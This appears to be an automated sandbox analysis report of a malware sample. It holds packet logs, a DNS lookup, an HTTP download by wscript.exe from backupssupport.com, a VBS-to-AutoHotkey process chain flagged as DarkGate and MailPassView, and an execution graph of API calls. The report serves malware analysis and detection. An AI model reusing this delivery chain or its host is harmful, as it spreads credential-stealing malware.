                                    Apr 17, 2024 06:39:56.354527950 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.354549885 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.354568958 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405231953 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405251980 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405262947 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405272961 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405284882 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405297995 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405312061 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405323982 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405335903 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405349016 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405360937 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405375004 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405388117 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405400991 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405414104 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405425072 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405436993 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405437946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405437946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405437946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405437946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405437946 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405448914 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405459881 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405466080 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405478001 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405489922 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405502081 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405502081 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405514956 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405524969 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405531883 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405550003 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405550957 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405564070 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405572891 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405577898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405591011 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405606031 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405606985 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405620098 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405626059 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405635118 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405647993 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405653954 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405663013 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405674934 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405680895 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405689001 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405700922 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405708075 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405714035 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405720949 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405730009 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405741930 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405744076 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405755997 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405767918 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405775070 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405785084 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405797005 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405805111 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405811071 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405824900 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405827999 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405838013 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405852079 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405864000 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405864000 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405867100 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.405886889 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.405915976 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506262064 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506278992 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506455898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506470919 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506479025 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506484985 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506499052 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506510973 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506511927 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506525993 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506537914 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506550074 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506552935 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506562948 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506577015 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506591082 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506592035 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506603956 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506611109 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506617069 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506629944 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506640911 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506643057 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506665945 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506676912 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506678104 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506689072 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506696939 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506702900 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506717920 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506732941 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506759882 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506762028 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506773949 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506799936 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506823063 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506830931 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506839991 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506853104 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506865978 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506869078 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506886959 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506913900 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.506962061 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506973982 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506984949 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.506997108 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507006884 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507016897 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507019997 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507030964 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507040977 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507047892 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507051945 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507062912 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507067919 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507074118 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507085085 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507087946 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507100105 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507111073 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507117987 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507123947 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507136106 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507148027 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507148981 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507158995 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507167101 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507170916 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.507200956 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.507226944 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525418997 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525432110 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525439024 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525445938 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525451899 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525458097 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525464058 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525470972 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525476933 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525482893 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525489092 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525492907 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525501013 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525506020 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525588036 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525602102 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525614023 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525626898 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525636911 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525640965 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525655031 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525667906 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525680065 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525693893 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525707006 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525772095 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525787115 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525798082 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525810003 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525829077 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525844097 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525857925 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525881052 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525881052 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525881052 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525882006 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525882006 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525882006 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525882006 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525882006 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525903940 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525903940 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525903940 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525903940 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525912046 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525924921 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525938034 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525950909 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525953054 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525962114 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525974989 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.525976896 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.525993109 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526000023 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526026964 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526037931 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526053905 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526077032 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526191950 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526204109 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526215076 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526226997 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526238918 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526242971 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526251078 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526264906 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526269913 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526281118 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526288986 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526294947 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526305914 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526307106 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526319027 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526333094 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526335001 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526345015 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526359081 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526361942 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526371002 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526380062 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526386023 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526398897 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526400089 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526413918 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526426077 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526427031 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526438951 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526452065 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526453972 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526464939 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526465893 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526480913 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526494026 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526500940 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526505947 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526520014 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526520967 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526535988 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526542902 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526549101 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526562929 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526563883 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526578903 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526583910 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526599884 CEST8049730205.234.201.153192.168.2.4
                                    Apr 17, 2024 06:39:56.526604891 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526628017 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526650906 CEST4973080192.168.2.4205.234.201.153
                                    Apr 17, 2024 06:39:56.526663065 CEST8049730205.234.201.153192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 17, 2024 06:39:54.504625082 CEST | 64502 | 53 | 192.168.2.4 | 1.1.1.1
Apr 17, 2024 06:39:54.823066950 CEST | 53 | 64502 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 17, 2024 06:39:54.504625082 CEST | 192.168.2.4 | 1.1.1.1 | 0x543e | Standard query (0) | backupssupport.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 17, 2024 06:39:54.823066950 CEST | 1.1.1.1 | 192.168.2.4 | 0x543e | No error (0) | backupssupport.com | | 205.234.201.153 | A (IP address) | IN (0x0001) | false
                                    • backupssupport.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 205.234.201.153 | 80 | 6640 | C:\Windows\System32\wscript.exe

Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 06:39:54.987380981 CEST | 330 | OUT | GET /fykbmgsz HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: backupssupport.com
                                    Connection: Keep-Alive
Apr 17, 2024 06:39:55.488548994 CEST | 1289 | IN | HTTP/1.1 200 OK
                                    Connection: close
                                    Content-Disposition: attachment; filename="fykbmgsz"
                                    Content-Type: application/octet-stream
                                    Content-Length: 795674
                                    Date: Wed, 17 Apr 2024 04:39:55 GMT


                                    Target ID:0
                                    Start time:06:39:53
                                    Start date:17/04/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
                                    Imagebase:0x7ff68fd10000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:06:39:56
                                    Start date:17/04/2024
                                    Path:C:\NwiQ\AutoHotkey.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
                                    Imagebase:0x400000
                                    File size:913'920 bytes
                                    MD5 hash:A59A2D3E5DDA7ACA6EC879263AA42FD3
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 4%, ReversingLabs
                                    • Detection: 1%, Virustotal, Browse
                                    Reputation:moderate
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:1.8%
                                      Dynamic/Decrypted Code Coverage:58.5%
                                      Signature Coverage:6.1%
                                      Total number of Nodes:1827
                                      Total number of Limit Nodes:45
104330->104331 104332 4844c09 47 API calls 104331->104332 104333 4847340 104332->104333 104334 4844f7d 104333->104334 104335 4844f91 104334->104335 104336 4844f81 104334->104336 104337 4844fbf 104335->104337 104837 4843585 11 API calls 104335->104837 104336->104335 104832 4844fed 104336->104832 104337->104103 104341 4872119 104340->104341 104341->104341 104839 4871e41 104341->104839 104349 4872167 104350 485a8b1 11 API calls 104349->104350 104351 4872172 104350->104351 104352 485b811 11 API calls 104351->104352 104353 487217d 104352->104353 104354 4845465 11 API calls 104353->104354 104355 487218f 104354->104355 104356 4874941 15 API calls 104355->104356 104357 4872197 104356->104357 104358 4875e39 12 API calls 104357->104358 104359 487219f 104358->104359 104360 48721a7 104359->104360 104361 487224a 104359->104361 104363 4874941 15 API calls 104360->104363 104362 4874f89 13 API calls 104361->104362 104364 4872252 104362->104364 104365 48721af 104363->104365 104366 484520d 11 API calls 104364->104366 104367 484520d 11 API calls 104365->104367 104368 4872260 104366->104368 104369 48721bd 104367->104369 104370 4875a5d 12 API calls 104368->104370 104371 4875a5d 12 API calls 104369->104371 104372 4872268 104370->104372 104373 48721c5 104371->104373 104374 48722b7 104372->104374 104375 487226c 104372->104375 104376 4872217 104373->104376 104377 48721c9 104373->104377 104378 4874f89 13 API calls 104374->104378 104379 4874729 13 API calls 104375->104379 104380 4874941 15 API calls 104376->104380 104381 4874729 13 API calls 104377->104381 104382 48722bf 104378->104382 104383 4872279 104379->104383 104384 487221f 104380->104384 104385 48721d6 104381->104385 104386 484520d 11 API calls 104382->104386 104387 485b811 11 API calls 104383->104387 104388 484520d 11 API calls 104384->104388 104389 485b811 11 API calls 104385->104389 104390 48722cd 104386->104390 104391 4872284 104387->104391 104392 487222d 104388->104392 104393 48721e1 104389->104393 104394 4873e49 17 API calls 
104390->104394 104395 4844f7d 11 API calls 104391->104395 104396 4873e49 17 API calls 104392->104396 104397 4844f7d 11 API calls 104393->104397 104398 48722d8 104394->104398 104399 4872291 104395->104399 104400 4872238 104396->104400 104401 48721ee 104397->104401 104403 4844f7d 11 API calls 104398->104403 104404 4874f89 13 API calls 104399->104404 104405 4844f7d 11 API calls 104400->104405 104402 4874941 15 API calls 104401->104402 104406 48721f6 104402->104406 104407 4872212 104403->104407 104408 4872299 104404->104408 104405->104407 104409 484520d 11 API calls 104406->104409 104410 485a8b1 11 API calls 104407->104410 104411 484520d 11 API calls 104408->104411 104413 4872204 104409->104413 104414 48722f2 104410->104414 104412 48722a7 104411->104412 104415 4874631 15 API calls 104412->104415 104416 4874631 15 API calls 104413->104416 104417 485b811 11 API calls 104414->104417 104415->104407 104416->104407 104418 48722fd 104417->104418 104419 4844f7d 11 API calls 104418->104419 104420 487230a 104419->104420 104421 4844f4d 11 API calls 104420->104421 104422 4872324 104421->104422 104423 4875a5d 104422->104423 104424 4875a6d 104423->104424 104425 4875a81 104424->104425 104913 4875a11 104424->104913 104427 4844f29 11 API calls 104425->104427 104428 4875aa4 104427->104428 104428->104109 104730 4874631 104428->104730 104430 48751ad 104429->104430 104925 485a8b1 104430->104925 104437 4848b09 11 API calls 104438 4875204 104437->104438 104439 4844f4d 11 API calls 104438->104439 104440 487521e 104439->104440 104441 484520d 104440->104441 104442 4845250 104441->104442 104443 4845211 104441->104443 104442->104118 104444 4844f7d 104443->104444 104445 484521b 104443->104445 104446 4844f91 104444->104446 104452 4844fed 11 API calls 104444->104452 104447 4845245 104445->104447 104448 484522e 104445->104448 104449 4844fbf 104446->104449 104981 4843585 11 API calls 104446->104981 104450 4845535 11 API calls 104447->104450 104451 4845535 11 API calls 104448->104451 104449->104118 
